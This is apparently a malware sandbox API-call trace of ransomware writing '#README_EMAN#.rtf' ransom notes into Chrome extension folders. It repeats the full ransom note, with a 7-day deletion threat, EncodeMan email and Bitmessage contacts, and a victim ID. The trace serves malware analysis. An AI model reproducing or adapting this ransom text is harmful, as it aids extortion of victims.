COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.308] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.309] CloseHandle (hObject=0x2e8) returned 1 [0289.309] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0289.309] GetLastError () returned 0x2 [0289.309] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet 